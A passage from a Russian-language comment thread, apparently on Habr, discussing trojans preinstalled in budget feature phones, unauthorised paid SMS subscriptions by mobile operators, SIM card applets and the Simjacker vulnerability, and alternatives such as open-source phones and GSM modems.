                  Проблема в том, что с приходом коммуникаторов/смартфонов эта функция почти перестала встречаться. А старые телефоны такое умели почти все, да.


                  1. Aelliari
                    04.09.2021 12:52

                    Андроиды это умели до эпохи шифрования, во время FDE - это умели некоторые, имеющие шифрование из коробки, при отключённом экране блокировки. Устройства с FBE из коробки - могут уметь это даже с активированной блокировкой экрана


        1. shoorick
          03.09.2021 09:31

          Будильник из выключенного состояния — знакомая история: у меня на Siemens SK65 такое было.


      1. MikUrrey
        02.09.2021 14:50
        +1

        Настроив таймер, я бы об этом знал.


  1. skobkin
    01.09.2021 01:32
    +14

    Спасибо за статью. Буду скидывать тем, кто говорит "надоели ваши смартфоны, куплю кнопочную звонилку".


    1. namikiri
      01.09.2021 11:02
      +3

      Да уж, я теперь начинаю думать что старый смартфон с Lineage на борту побезопаснее будет, чем кнопочная звонилка-в интернет выходилка.


      1. skobkin
        01.09.2021 15:10
        +1

        LineageOS обычно не контролирует ту часть, которая называется firmware. Так что оно будет побезопаснее только частично.


        1. namikiri
          02.09.2021 10:35

          Да, в курсе про проприетарные блобы и загрузчик. Но тем не менее, если вдруг что-то подобное будет твориться, энтузиасты быстренько это дело спалят, как мне кажется.


          1. skobkin
            02.09.2021 16:19

            Если будут целенаправленно этим заниматься.

            Ну и даже когда спалят - ничего не произойдёт - только другие энтузиасты об этом и узнают.


  1. mSnus
    01.09.2021 01:44
    +6

    Дешёвые не-кнопочные не лучше. Покупая дешёвый Haier, вы автоматически соглашаетесь на предустановку троянов, которые потом никак не вычистишь.

    За статью спасибо, не знал, что кнопочные тоже заранее затроянены.


    1. skobkin
      01.09.2021 02:21
      +3

      И не дешёвые.

      Если посмотреть на гитхабах-xda-4pda - можно найти кучу инструкций как с каких-нибудь флагманов выпиливать софт разной степени вредоносности.

      Нет, дорогие телефоны обычно SMS не отправляют за вас, но вот стучаться на сервера статистики как минимум - вообще без проблем.


      1. in_heb
        01.09.2021 02:41
        +4

        Даже если вендор сам этого не делает, то вот гугловский софт (Google services), модифицировать который вендор не может, очевидно шлёт телеметрию, потому что данные это и есть суть бизнеса гугла


    1. 3aBulon
      04.09.2021 07:25

      Доказательства есть? Haier нифига не дешевый и таки бренд, хотя смартфоны не их профиль.


  1. Sabubu
    01.09.2021 01:53
    +7

    …а что с приёмом СМС?
    Ни один из купленных телефонов не предоставляет полноценный AT-порт через USB или Bluetooth. Чтение SMS-сообщений с компьютера не реализовано нигде.

    Если вас интересует прием СМС как можно дешевле, посмотрите в сторону GSM-модемов вроде A6, A7, SIM900. У них SPI-интерфейс, есть возможность отправки СМС, GPRS и даже звонки. На алиэкспрессе от 350 р. Правда, они новомодные 4G не поддерживают. Правда, я их не тестировал и гарантировать что-то не могу.


    Ну и DNS, конечно, разочаровал. Вроде приличный магазин был.


    1. ValdikSS Автор
      01.09.2021 01:55
      +2

      Про SIM800, SIM900 знаю. Телефоны хотелось использовать именно по причине их доступности в обычных магазинах.


      1. acc0unt
        01.09.2021 02:41

        В итоге оказывается, что если их и можно для этого использовать, то только с кастомной прошивкой?


        1. ValdikSS Автор
          01.09.2021 10:33

          Да, причём дописывать свою функциональность придётся для каждой модели отдельно, прошивки чаще всего даже у похожих внешне/аппаратно моделей несовместимы. Это бесперспективная затея, учитывая, что телефоны выпускаются небольшими партиями и продаются не больше 2-2.5 лет.


          1. svpcom
            01.09.2021 20:30

            Прямо хоть свой кнопочный телефон делай на основе sim800 + stm32 + экран.
            Странно, что до сих пор никто не пытался. Я несколько лет назад хотел было начать, но потом решил, что не смогу сделать качественно корпус и железо (что бы долго работало и мало места в кармане занимало)


            1. drWhy
              01.09.2021 20:50
              +2



              1. svpcom
                01.09.2021 23:09

                ну вот такое и НЕ хочется получить…
                А хочется нормальный компактный кнопочный телефон и с минимумом функциональности и открытой прошивкой. Если кто соберется сделать железо, то я могу помочь с софтом.


                1. Thero
                  02.09.2021 00:11

                  уже есть опенфоны с опенсурс прошивками.. хз как это спасает от бэкдоров в симкарте, но уже лучше..


                  1. litos
                    02.09.2021 07:35

                    Нужен опенсорс телефон с ESIM, интересно, такое реально?

                    Тогда скорее всего трояна не будет


                    1. Thero
                      02.09.2021 10:12

                      Пожалуй да. Надеюсь ктонибудь в итоге сделает компактную плату с гсм стэком и поддержкой есим, но там полагаю куча регуляторных проблем..


                    1. id_potassium_chloride
                      04.09.2021 22:19

                      Про ESIM не знаю, а вот VoIP есть -- WiPhone. Правда реализация мне всё равно не нравится, как-то костыльно что ли


                  1. svpcom
                    02.09.2021 08:35

                    есть полтора телефона (pinephone и librem 5). Первый не доставляют в РФ, а второй уже четвертый год обещают сделать. Автономность у них меньше суток. Причем это больше компьютер с линуксом, чем телефон. opensource кнопочного телефона я не нашел (кроме концепта на ардуине в виде кучи плат и проводов с непонятной автономностью).


                    У меня требования к телефону такие: автономность от недели, удобное чтение sms, быстрый набор (возможность повесить несколько номеров на клавиши), календарь, диктофон и фотокамера. Без интернета и сторонних приложений.


                    От бекдоров в симкарте спасет только открытая прошивка модема, но тогда придется засунунуть внутрь limesdr и автомобильный аккумулятор. Но в случае бекдора в сим-карте понятно кому предъявлять претенизии, чем в случае noname телефона, который продает фирма-однодневка


      1. vladkorotnev
        01.09.2021 11:20

        Если через юзб, почему бы не взять просто USB-модем провайдерский и разлочить похожим боксом? Держу два таких, оба видятся как ttyUSBX, третий год полёт нормальный — главное сервисными командами запретить часть режимов, чтоб питания хватало точно.


        1. Dare
          01.09.2021 11:35

          Не напишете статью про нюансы и режим работы?


          1. vladkorotnev
            01.09.2021 11:38

            Да тут недавно кто-то уже описывал — у меня примерно такая же конструкция, разве что не на FreePBX и не на распберри https://habr.com/ru/post/550734


            Но если софт свой городить, то и астериск не нужен — по сути модем висит, как и любой другой, на компорту.


            А, ещё мне свой Е1550 приходилось разлочивать на голосовые звонки каким-то боксом как раз. Уже не вспомню, как назывался, помню, что разлочка голоса была что-то вроде 3 евро за 1 модем, при этом найденные на просторах АТ команды не помогали. Зато для отвязки от оператора помог как раз, емнип, написанный ОПом этой статьи генератор.


      1. VIPDC
        01.09.2021 13:38

        Мы в одном месте до сих пор используем старые телефоны nokia и ПО PC Suite.

        10 лет полет нормальный


    1. nitro80
      01.09.2021 03:45
      +2

      Этот приличный магазин продаёт откровенный китай, но под своим шильдиком и в пару раз дороже.


      1. StraNNicK
        01.09.2021 15:57

        Всё так, но про дороже — не соглашусь.
        Очень часто у них есть то же, что на Ali, по тем же ценам, но здесь и сейчас и с, внезапно!, гарантией.


      1. JustDont
        02.09.2021 15:29
        +3

        Днс в массе не продаёт (и не продавал) что-либо "в пару раз дороже". Хотя локальные ситуации вполне возможны, и при колебаниях курса доллара тоже бывало (днс очень резв в поднятии цен, в то время как мелкие вендоры могут еще долго продавать по старым ценам).
        Но в массе у них вполне нормальные цены и довольно низкая маржа (за которую вы получите вещь "здесь и сейчас" и с нормальной гарантией).


    1. belyvoron
      01.09.2021 18:47

      Более новые поддерживают. SIM7600, например, умеет 4G. А SIM7000 - аж Nb-IoT. Вдобавок, поддерживают MQTT (и даже MQTTS) из коробки - можно слать pub/sub любому MQTT брокеру, даже в AWS/Azure прямо через At-команды.

      Стоят, правда, уже не 3 копейки.


  1. gus26
    01.09.2021 02:09
    +3

    Интересно, а в смартфонах тоже трояны зашиты? Раз уж в кнопочные телы могут такое загнать, то в смартфон и подавно...


    1. skobkin
      01.09.2021 02:19
      +7

      Да.


    1. moooV
      01.09.2021 04:28
      +6

      Лет пять назад купил жене дешёвый BQ тысячи за четыре. С первого взгляда был обычный телефон, но уже через три дня начали появляться левые игры пачками, засирали все меню запуска. Удаляешь - через полчаса снова появляются, да ещё и с новыми.

      Сначала просто игнорировали. Потом ещё через пару дней начала лезть полноэкранная реклама при запуске любого приложения, даже системного. Будильник? Смотри рекламу. Погода? Реклама. Итд.

      В общем, пользоваться стало нереально, сдали назад в DNS и вернули деньги, купили сяоми в пару раз дороже. Хоть и минимальная модель, но такой херни там не было.


      1. Endru9
        01.09.2021 09:27
        +4

        На двух Fly Compact тоже постоянно реклама была. Делаешь сброс до заводских настроек — дня 2-3 полет нормальный, и снова все возвращается. Конечно вылечилось всё с заменой прошивки, но осадок остался.

        Кстати про сяоми: там тоже куча рекламы, в некоторых приложениях она уже отключается только на 30 дней! Через 30 дней операцию нужно повторять.

        Мне не нравится современный подход к технике:
        Купил смартфон — отключай рекламу!
        Купил лицензию на винду — отключай рекламу…


        1. hollycon
          01.09.2021 10:03
          +2

          Так это не подход к технике, это подход маркетологов к монетизации и к максимальному удешевлению любой электроники. Виток капитализма - электронику делаем дешевле, но отобьём своё за счет рекламы. В идеале - подписка. И теперь не только в железе, но и в ПО.


          1. ValdikSS Автор
            01.09.2021 10:35

            Я очень удивился, увидев во F+ Flip 3 игры по подписке. Их нельзя купить, их можно только арендовать на какое-то количество дней за платную СМС, но через один или два месяца их снова нужно будет оплачивать.


            1. bgBrother
              01.09.2021 16:47
              +1

              Интересно, каким образом маркетологи считают свой профит? Как можно говорить о «удешевлении», если оператор 35-45% от платной СМС забирает себе? И о каком промежутке времени и ЦА они говорят, когда подсчитывают прибыль из аренды приложения? Вероятно, проще было поднять стоимость смартфона на 20 баксов…


              1. wataru
                01.09.2021 20:18
                +4

                А с чего вы взяли, что они что-то считают и цену снижают на примерную сумму заработка от рекламы и троянов? Нет, они просто впендюривают рекламу для дополнительного заработка — сверху к цене.


        1. StraNNicK
          01.09.2021 16:00

          пот поэтому я и перестал брать сяоми. С 1+ таких проблем нет.

          Т.е. это всё-таки не современный подход к технике, это проблемы отдельных производителей.


          1. Arioch
            02.09.2021 12:23

            Oppo/OnePlus другое поветрий подхватили, убирают разъёмы для наушников и слоты MicroSD

            В принципе, на современных версиях Андроида и смартфонах отдельный слот под microSD уже и в самом деле не сильно полезен, но наушники иногда лучше проводные.

            Впрочем, сколько людей - столько и мнений.


      1. 3aBulon
        04.09.2021 08:24

        Xiaomi прямо сейчас — все модели из коробки. Чтоб отключить рекламу в оболочке и софте везде — нужны особые скиллы.


        1. Popadanec
          04.09.2021 12:04

          Даже в калькуляторе! И для его использования, нужно подписать отдельное соглашение(redmi 4x).


    1. POPSuL
      03.09.2021 13:41
      +1

      Да, я 7 лет назад писал статью о "чудесном" highscreen =)

      https://habr.com/ru/post/239213/


  1. bopoh13
    01.09.2021 02:11
    +14

    Наконец раскрыта тайна, как новый номер телефона попадает в списки рассылки.


    1. in_heb
      01.09.2021 02:43
      +4

      Нет, всё куда проще, номеров не так много и модно обзвонить все номера РФ за день


      1. blind_oracle
        01.09.2021 10:21

        Пора переходить с номеров на UUID или публичные ключи аля Tox :)


        1. morijndael
          01.09.2021 11:00
          +1

          Тут десять цифр некоторые запомнить не могут, а вы предлагаете перейти на UUID?


          1. vladkorotnev
            01.09.2021 11:21
            +10

            Кто-то десять цифр запомнить не может, а у кого-то в голове до сих пор J3QQ4-...


            1. farcaller
              01.09.2021 14:36

              Ну так H7H2V приходилось набирать много и часто :-)


            1. StraNNicK
              01.09.2021 16:01

              его ещё помню, а вот на w95, который раньше помнил не хуже, уже всё, стёрся из памяти.


              1. DMGarikk
                01.09.2021 17:18

                в большинстве (если не из всех) пиратских дистрибов w95, запрос серийника был выковырнут из инсталлятора


                1. vladkorotnev
                  01.09.2021 17:39

                  Да там и так была проверка чуть ли не уровня "сумма всех цифр равна 95" и серийники были подстать, типа 1111-111011


                  1. Nikon_NLG
                    08.10.2021 18:33

                    Office 97 вроде.

                    0401-2345678


              1. zuek
                10.09.2021 09:45

                w95 и офис 97 я всегда "активировал" датой рождения владельца + цифра, доводящая сумму всех цифр в серийнике до кратного 7. Например, если дата рождения 01.01.1921, то серийник будет 0101212 (это после префикса, который за давностью уже забыл, и попытки найти в интернетах повергли лишь в уныние, т.к. мне помнится что-то типа 40 или 040, а поиск выдаёт совершенно иные префиксы CD-Key)


          1. blind_oracle
            01.09.2021 12:39
            +2

            Я помню только номера жены и детей. Ну, ещё родителей т.к. этим номерам уже 20 лет и забыть уже не могу) А, ну еще свою аську зачем-то.

            Остальные то зачем помнить? Или речь про свой номер?


  1. achekalin
    01.09.2021 06:50
    +5

    Что творится на более «умных» телефонах, остается только догадываться. Куда, скажем, отстукивается безродный (да и «родовитый») китайский смарт - о, там могут быть варианты, а, поскольку он «смарт» то он еще и может в разное время делать разные вещи, и обновлять свои умения!


    1. eurol
      01.09.2021 08:50

      Смарт или не смарт — тут большой разницы нет. В любом случае телефон может скачивать что хочет, когда хочет — дело-то в прошивке.
      Единственная разница — у смарта больше места, куда можно записать относительно незаметно любое гадкое ПО.


    1. VIPDC
      01.09.2021 13:43
      +1

      Со смартами проще. Поставил norootfirewall и всё попытки обратится обрубаются. Потом используя ADB гасим всех кто пытался действовать самостоятельно.

      Приводил в порядок так телефон Fly маленький который использовал как точку доступа. После чистки стал работать в 4-е раза больше.


  1. Golex
    01.09.2021 07:05
    +7

    Спасибо! Уже казалось нет иллюзий в этом вопросе, а вам удалось сорвать покровы.


  1. smart_alex
    01.09.2021 07:34
    +18

    Прочитал статью и выпал в осадок — как такое вообще возможно — официально продавать телефоны с троянами и сливанием пользовательского счёта?

    Особенно пикантно выглядит целевая аудитория — у бабушки без SDR и базовой станции не много шансов понять куда и как утекают деньги с её счёта.

    А про доказать кому-то, что «бабушка» не сошла с ума, а это телефон САМ расходует средства — вообще речи не идёт.


    1. Jsty
      01.09.2021 09:30
      +1

      Было такое дело с телефоном, модель которого даже не вспомню.

      Он ходил в интернет, при этом в функциях этого не было и браузера в телефоне так же не было.

      В итоге удалось в документации производителя раскопать, что телефон ходит в интернет для, внимание, синхронизации времени(!). Ни в каких характеристиках в интернет-магазинах про интернет не было ни слова (в том числе аббревиатур типа GPRS).

      Пришлось через оператора запретить интернет вовсе, т.к. бабушке интернет ни в каком виде на кнопочной звонилке не был нужен.


      1. F0iL
        01.09.2021 11:56

        телефон ходит в интернет для, внимание, синхронизации времени(!)

        Жесть какая. Вот радости будет человеку, который уехал в отпуск в другую страну, и там с него разом списали 399 рублей за один выход в интернет по GPRS просто потому что звонилке захотелось синхронизировать время.


        1. Borz
          02.09.2021 08:45

          в своё время, мне один красный оператор вернул деньги за "использованные" услуги. Возврат инициировали сами, но по заявке от меня с вопросом "что за фигня?". Причиной возврата денег обозначили типа "списание средств за услугу без технической возможности её предоставления".


          1. Popadanec
            02.09.2021 09:52

            А не вернули бы и вы с каким то шансом могли пойти в суд, а там многое может всплыть, да и иск стать коллективным. Вот они и балансируют.


          1. Arioch
            02.09.2021 12:36
            +1

            МТС весёлые ребята, они и сами подписывают, и прячут из личного кабинета. Во всяком случае, делали так лет 5-10 назад. Купили тогда USB-модем, сразу вошли в личный кабинет, отключили все платные услуги. Месяц было хорошо, потом деньги "потекли". Куда потекли? Оказалось на услугу "Гудок", если помните такую. Замена у звонящих мне стандартного тона вызова на мелодии. Вот только НА МОДЕМ мне сроду никто не звонил. А поддержка МТС включила дурака -

            • - у вас подключена платная мелодия, сами так выбрали

            • - у меня в л/к указано отсутствие платных услуг

            • - правильно, у вас их и нет

            • - а деньги за что списываются

            • - за мелодию

            • - а мелодия откуда взялась

            • - настройка услуги "Гудок"

            • - значит мелодия - часть услуги "Гудок"

            • - да

            • - значит услуга "Гудок" платная. Почему л/к врет, что бесплатная.

            • - л/к правильно пишет, бесплатная

            • - если бесплатная - верните деньги, которые на эту услугу списали

            • - у вас выбрана платная мелодия, правильно списаны

            И по такому кругу три дня. ПОТОМ вернули.


      1. nlykl
        01.09.2021 12:56
        +2

        Офигеть. А разве сама по себе сеть GSM не умеет синхронизировать время?


        1. ValdikSS Автор
          01.09.2021 13:01

          По непонятной причине, время через GSM синхронизируется только на Inoi. На трубках под Spreadtrum и MTK только через интернет либо установкой вручную.


          1. tormozillo
            02.09.2021 14:10

            Был у меня телефон Lumia который на Windows, так в нем выбор был как синхронизировать время: по сети GSM или через интернет по ntp. Хорошо запомнил что в сети оператора с точностью времени бардак полный был, один раз ночью само на полтора часа назад ушло и будильник "проспал". Поэтому только через интернет.


        1. balamutang
          01.09.2021 14:29
          +2

          Можно синхронизировать по сети GSM, но там кстати не всегда все ровно, у меня например час добавляет, видимо в сети время московское, постоянно отключаю эту функцию.

          Вообще конечно неправильно синхронизировать все (дату/часы/минуты/секунды), надо синхронизировать только секунды (за сутки встроенный таймер не уйдет далеко), но почему-то до такой простой вещи ни у кого руки не доходят.


          1. JPEGEC
            16.09.2021 08:51
            +2

            С секундами плохая идея. Убежит на полминуты время и возникнет разница минут а вы опа и секунды поправили, оставив минуты.

            Или при смене времени при движении.

            Обновлять нужно все. Включая год.


    1. alexleo
      01.09.2021 12:15
      +1

      Я после поездки за границу с удивлением узнал, что у МГТС при подключении к сети телефон отправляет небольшой служебный пакет, который выглядит, как обычное интернет-соединение. Не знаю, что это было, но я так понял, что это какая-то особенность протокола. Только вот некоторые особо жадные забугорные операторы при этом радостно включают этот пакет в биллинг, как будто вы сами в интернет ходили, а МГТС не менее радостно списывает с вас оплату за использование интернета в роуминге, когда интернет на телефоне отключен. При этом, судя по биллингу, некоторые операторы за границей отлично понимают, что никакой это не интернет, и подобной глупостью не занимаются, но, увы, не все.

      Изюминка тут в том, что в МГТС у вас кредитная система оплаты с лимитом, и как только за счёт таких списаний вы уходите за этот лимит, телефон вам отключают, и даже пополнение счёта не позволяет включить его обратно. Мне ещё повезло, дата выставления счёта была примерно сразу после возвращения на родину, но в интернете видел отзыв, как люди неделю сидели без телефона.


  1. smart_alex
    01.09.2021 07:37
    +1

    Столкнулся с обратной ситуацией — телефон старый, брендовый и на 100% проверенный и надёжный — при подключении к нему некоторых новых симок начинается НЕСАНКЦИОНИРОВАНННАЯ активность ТИХИЕ (СКРЫТЫЕ) звонки и СМС на платные номера опсоса.

    При обращении в техподдержку опсос делает покерфейс и заявляет, что это я сам (дурак) и (видимо в порыве пароксизма) звонил на платные номера. Что конечно не так, как минимум по двум причинам:

    1. Я вообще никуда не звонил (не брал в руки телефон) за тестовый период

    2. Я не знал эти номера, поэтому физически не мог на них звонить и посылать СМС

    Отсюда вопрос: что это было и могут ли симки жить своей жизнью и использовать телефон для несанкционированных звонков и рассылки СМС?


    1. Syzd
      01.09.2021 08:33

      скажите название оператора?


      1. smart_alex
        01.09.2021 08:46
        +3

        Описываемый случай произошёл с Мегафоном. Они за 24 часа после покупки их симки слили со счёта 600 рублей на свои платные номера. Техподдержка заявила, что это я сам звонил на их платные номера и если меня что-то не устраивает, то я могу подать на них в суд.

        На следующий день (официально) расторгнул договор и забыл о Мегафоне, как о страшном сне, но вопрос о несанкционированной активности симки остался открытым.


        1. Cirno_9
          01.09.2021 09:54
          +3

          Поневоле вспоминается случай, как у чувака гаражные ворота сами подписались на несколько развлекательных рассылок. Тут и чисто хардовые Sim800/900 не спасут, наверное.


          1. simpleadmin
            01.09.2021 11:19
            +3

            У меня нокиа 5110 на пожарной сигнализации трижды на различные рассылки "подписывалась". Окончательно "отписаться" помогло только письменное заявление в МТС.


          1. urix
            01.09.2021 15:21
            -1

            Ну, у меня модем на Теле2 подписался на рассылки, было дело.

            При этом, в отличии от Мегафона, деньги за подписки не вернули. Мегафон хотя бы возвращает эти деньги, Теле2 - свои правила, мы вам ничего не вернём.


            1. Popadanec
              01.09.2021 15:26
              +2

              Модемы действительно сами подписываются. Это механизм обновления прошивки. Нужно было прийти с модемом к ОПСОСу и потрясти им перед глазами человека там работающего, тогда бы вернули точно.


              1. booyakacrew
                12.09.2021 15:25

                Не совсем, на сколько я знаю, там по IMEI модемам подписку со специальным USSD-меню подсовывают, так как "механизм обновления прошивки" не умеет подтверждать второй USSD-код.


                1. Popadanec
                  13.09.2021 10:06

                  Т.к. к IMEI имеет доступ только ОПСОС, то на лицо умысел, который реально доказать в суде? Вся проблема только в размере ущерба. И возможности для других о деле узнать и повторить.


          1. Tatikoma
            02.09.2021 17:24

            Не факт что в них не было закладки для этого =) Нужно реверсить прошивку.


        1. alexleo
          01.09.2021 12:20

          Я ушёл с мегафона после трёх случаев подписки не понятно на что. В двух случаях, по их словам, это была "отправленная смс", в третьем — их приложение, якобы я в него зашёл и подписался. При этом минимум в одном случае (в других не помню) телефон в момент подписки просто был отключен, т.к. батарея сдохла, а о подписке я узнал из смс, которое пришло после включения телефона. У меня были (и остаются) некоторые подозрения, что проблема могла быть и в телефоне, но случай "подписки через приложение", скорее, говорит об обратном. Хотя за десять лет до этих случаев ни разу подобного не случалось.


        1. Ontaelio
          01.09.2021 14:43
          +8

          я могу подать на них в суд

          У меня и бабушку, и маму Билайн подписывал на всякие сервисы типа знакомств. Причем у бабушки, пока разобрались, пчеловоды наковыряли под 9 тыр за несколько лет. Поддержка, разумеется, впадала в режим "это вы сами, подавайте в суд, если хотите".

          Нюанс в том, что они уверены, что подавать вы никуда не будете. Но бабушка у меня была кремень, она всю жизнь проработала архитектором в исполкоме и умела и в суд, и в канцелярит. Поэтому было написано заказное письмо с уведомлением, где в доступной форме описывались все дальнейшие действия (тот самый суд и прокуратура). Деньги вернули через пару дней после получения эпистолы, причем в том размере, который насчитали мы, а не сам Билайн.


        1. leonidy85
          07.09.2021 16:11
          +1

          у меня валяется старенькая нокиа в качестве звонилки, включаю раз в пару месяцев, так вот мне мегафон за то время что телефон был выключен сделал пару подписок, обнулил баланс, благо там всего было 200р и на вопрос как так то, сказал что возможно телефон кто то из родственников или знакомых включил...

          Вообщем договор с ними разорвал.


          1. axe_chita
            08.09.2021 05:05

            «Папа с детьми разбирается проще, сложит в авоську, и в ванной полощет»
            МТС вариант с безмолвно лежащим телефоном решает проще, если вы не совершали платных действий (звонков/смс) в сети оператора в течении 3-х месяцев, то вас автоматом переводят на тариф с ежедневным списанием средств. Перед этим, вам прилетает смс с предупреждением, а там вы решайте сами «сделать звонок другу», или «гулять так гулять! плачу за всё!»


            1. Popadanec
              08.09.2021 10:04

              Похожим образом действуют все ОПСОСы, потому что номеров не хватает.


              1. YMA
                08.09.2021 10:20

                Не то что не хватает, получить номерную емкость можно без особых проблем. Просто номера - платный ресурс, и простаивающий номер раздражает оператора. ;)


                1. Popadanec
                  08.09.2021 15:10

                  Судя по тому как номера вручают порой уже через две три недели после расторжения контракта с предыдущим абонентом, я бы не был так уверен.


                1. GordeyUA
                  01.09.2021 18:05
                  +1

                  Главное отличие - эппл выводит предупреждение, что будет отправлена СМС и возможно, за это спишутся деньги. И дает возможность отказаться. Если бы китайцы делали так же - вопросов бы не было.


  1. anonymous
    00.00.0000 00:00


    1. ValdikSS Автор
      01.09.2021 10:44
      +10

      могут ли симки жить своей жизнью и использовать телефон для несанкционированных звонков

      Да, могут. SIM-карта — это мини-компьютер со своей операционной системой и расширенными привилегиями, которая может обновляться сервисными СМС или через интернет. Она может сама инициировать отправку SMS-сообщений (что делает моя SIM Билайн, например, если определяет, что её вставили в другой телефон, не в тот, в котором она находилась в прошлый раз), совершать звонки (не уверен, что скрытые, но обычные — точно может), выходить в интернет (как просто инициировать открытие страниц на телефоне, так и обновлять свои апплеты через интернет).

      Я находил в интернете жалобы на то, что SIM-карта отправляет СМС на свои сервисные бесплатные номера в роуминге, а в роуминге они принадлежат роуминговому оператору и тарифицируются отдельно:

      https://cells.ru/forum/read.php?3,1535099,1535099#msg-1535099

      https://zvonok.octo.net/number.aspx/0494

      Также в картах встречаются уязвимости. Атака simjacker позволяет подделать сервисные СМС и отправить их самостоятельно: https://simjacker.com/

      Про возможности карт рекомендую посмотреть видео от Funbox — компании, которая встраивает сервис СМС-подписок на кнопочные телефоны: https://www.youtube.com/watch?v=CumGQSX6_ws


      1. Meklon
        01.09.2021 10:53
        +1

        Я обычно сразу удаляю приложение SIM-меню. Так себе защита, но хоть пуши перестает вываливать.


        1. smart_alex
          01.09.2021 11:30
          +2

          А так можно было? :) Надо воспользоваться советом...


          1. Meklon
            01.09.2021 15:49
            +1

            Ты хоть раз этой хренью пользовался?) Поэтому есть смысл отрубить коннектор этой штуки к ОС.


            1. Popadanec
              01.09.2021 16:00

              По крайней мере у Теле2 она отключается(без получения рута) из своего же меню и больше не беспокоит.


      1. smart_alex
        01.09.2021 11:11
        +2

        Спасибо за разъяснение, теперь понятно, что происходит, когда вставляешь симку от Мегафона в телефон.

        Особый привет техподдержке Мегафона, которая пыталась убедить меня, что я сошёл с ума и сам позвонил (несколько раз!) по их платным номерам.


  1. vsb
    01.09.2021 08:00
    +10

    Вообще я считаю, что в современном мире утеряны секреты создания хороших кнопочных телефонов. Я своим пожилым родственникам не один раз покупал кнопочные телефоны и их качество очень низкое. В первую очередь софт - всё дико тормозит. Предполагаю, что их разрабатывают исходя из минимизации затрат и отсюда все проблемы. Т.е. их делают не для людей, которым нужен кнопочный телефон, а для людей, которым нужен максимально дешёвый телефон.

    Поэтому недавно я поискал старые телефоны и нашёл людей, которые продают их в хорошем состоянии, на вид как новые. И цена вполне приемлема.

    В общем моя рекомендация желающим пользоваться кнопочным телефоном - купить именно старый телефон. Софт там вылизан не в пример современному, ничего не тормозит, аккумулятор работает дольше и качество изготовления выше, если брать хорошую модель.


    1. mikelavr
      01.09.2021 08:50
      +3

      Только вот аккумулятор за годы лежания без эксплуатации скорее всего потребуется заменять на свежий - и он будет хуже оригинала.


      1. seraz
        19.11.2021 10:18

        видел как собирали аккумы из нескольких новеньких +-хороших из имеющихся в сц/магазинах побрендовее. это для планшетов/ноутов. т. е. у вас трабла будет только найти нужного размера банку. потом перепаять плату с старого на новый. м. быть та банка и чуть меньше или чуть толще окажется, не суть. главное чтобы влезло в корпус, крышка закрылась и тп.


      1. Angeld
        01.09.2021 10:13

        так старые протоколы везде есть

        gsm так обязательно

        это 3g/4g не везде доступны

        тут больше с современным веб проблема, который на 2g работать не может


        1. Aleshonne
          01.09.2021 10:58
          +5

          Например, Tele2 в Москве и области работает только на 3G и 4G. Протоколы 2G и ниже не поддерживаются.


          1. jazzl0ver
            01.09.2021 14:08

            В Питере такая же фигня с 2G у Теле2


            1. Linulin
              07.09.2021 16:04

              Видимо, зависит от радио-частоты, используемой конкретной моделью телефона, так как 2G у Tele2 в Питере пока ещё поддерживается.


            1. ilyamodder
              01.09.2021 14:59

              iMessage тоже не требует, просто по номеру телефона работать не будет, если отказаться. FaceTime вроде оттуда же возьмет телефон, ибо зачем два раза смс отправлять


  1. anonymous
    00.00.0000 00:00


  1. anonymous
    00.00.0000 00:00


    1. balamutang
      01.09.2021 14:47

      Современные кнопочные телефоны стоят копейки против тех сотен долларов которые стоили телефоны времен 3310, нечего удивляться что их делают неизвестно кто задней ногой - лишь бы работали.


      1. quwy
        01.09.2021 17:30
        +1

        Так они и проще на порядок. Мой первый Ericsson GA628 имел радиотракт на гибридных сборках, и кроме этого еще десяток цифровых микросхем на плате. А современные что? Один SoC на все про все, и к нему пара тараканчиков силовой обвязки. Даже антенна вытравлена прямо на текстолите.


        1. balamutang
          01.09.2021 18:32

          Ну в любом случае одни только эти гибридные сборки не стоят сотен баксов, тогда телефон был дорогой и долговременный продукт с соответствующей ценой и подходом. А сейчас клепают эти SoC'и на одну-две партии, поэтому никакой оптимизацией уже никто не занимается, тяп-ляп и в продакшн, надо уже следующую модель лепить.

          И это при том что эти новые телефоны полноценные участники интернета - у них не бывает ни апдейтов ни альтернативных ос, а баги там наверняка есть, странно что их еще не эксплуатируют в хвост и гриву.


    1. YMA
      01.09.2021 14:56

      Уже поздно. Я пробовал попользоваться (в порядке прикола) Siemens C55. Аккумулятор на Юноне нашелся без проблем, но столкнулся с тем, что у операторов 2G уже слабеет, во многих местах на МТС и Меге кваки-бульки и даже непрозвон. При этом 3G и VoLTE - прекрасно.

      В итоге мне глянулся Nokia 8110 4G, кнопочник с флипом, но на него можно поставить кастомную GerdaOS без (?) закладок и бэкдоров, и он обеспечивает прекрасное качество связи.


      1. urix
        01.09.2021 15:23
        +1

        6 тысяч за звонилку... это перебор :(


      1. seraz
        01.09.2021 19:29

        внешне 8110 4G весьма на любителя.

        gerdaOS не обновляется уже годами, к сожалению. крч. искать только android кнопочные с кастомными прошивками. даже 4xA55 +3Gb+ ram будут сильно лучше поделий на kaiOS, и тп.

        или может быть некие самосборы на r. pi/orange pi/... их давненько не обновляли, а последний rpi на A73, вроде бы был. новый м. быть будет на A75. а это уже неплохо. и может быть стандартные говно экраны поменяются на что-ниб более приличное, в духе mi mix 2s/3 внешностью. ips стоит копейки же.

        клаву хочется кверти. рамки минимальные.

        если еще и будут подороже варианты с 12/16ГБ оперативки. то однозначно вин. т. к. 12ГБ+ это сегодня только в топ и дорогущихх девайсах. за десятки к. минимум 25-30. тогда кучу народа обратят...)


        1. ilyamodder
          01.09.2021 13:54
          +3

          на Айпаде все это регистрируется без всяких СМС

          После того, как смс отправилось на айфоне :) либо только по e-mail, без привязки к номеру телефона.


  1. anonymous
    00.00.0000 00:00


    1. GordeyUA
      01.09.2021 11:10
      +9

      надо начинать с Айфонов, которые тоже сразу куда-то что-то отправляют. И отказаться вроде можно, но тогда Айфон превращается в бескнопочную звонилку

      Не читайте до обеда советских газет (с)
      Айфон отправляет один СМС для активации iMessage. Но, во первых, он об этом предупреждает, а во вторых - можно отказаться, и будет работать все, кроме iMessage.


  1. anonymous
    00.00.0000 00:00


  1. anonymous
    00.00.0000 00:00


  1. anonymous
    00.00.0000 00:00


  1. v-oz
    01.09.2021 09:03

    И в корне имеем обыкновенную жажду наживы. Капитализм, что ж делать...

    Спасибо, что поделились.

    Жаль, что с первоначальная затея не прошла


    1. altone
      01.09.2021 16:43
      +3

      Речь, вроде бы, в основном о китайских разработчиках. У них же там коммунизм во все поля?


      1. v-oz
        01.09.2021 16:51

        А точно прошивки делали в Китае, а не просто заливали на фабрике то, что им прислали? Половина из описанного - российские бренды, вроде сказано в посте.

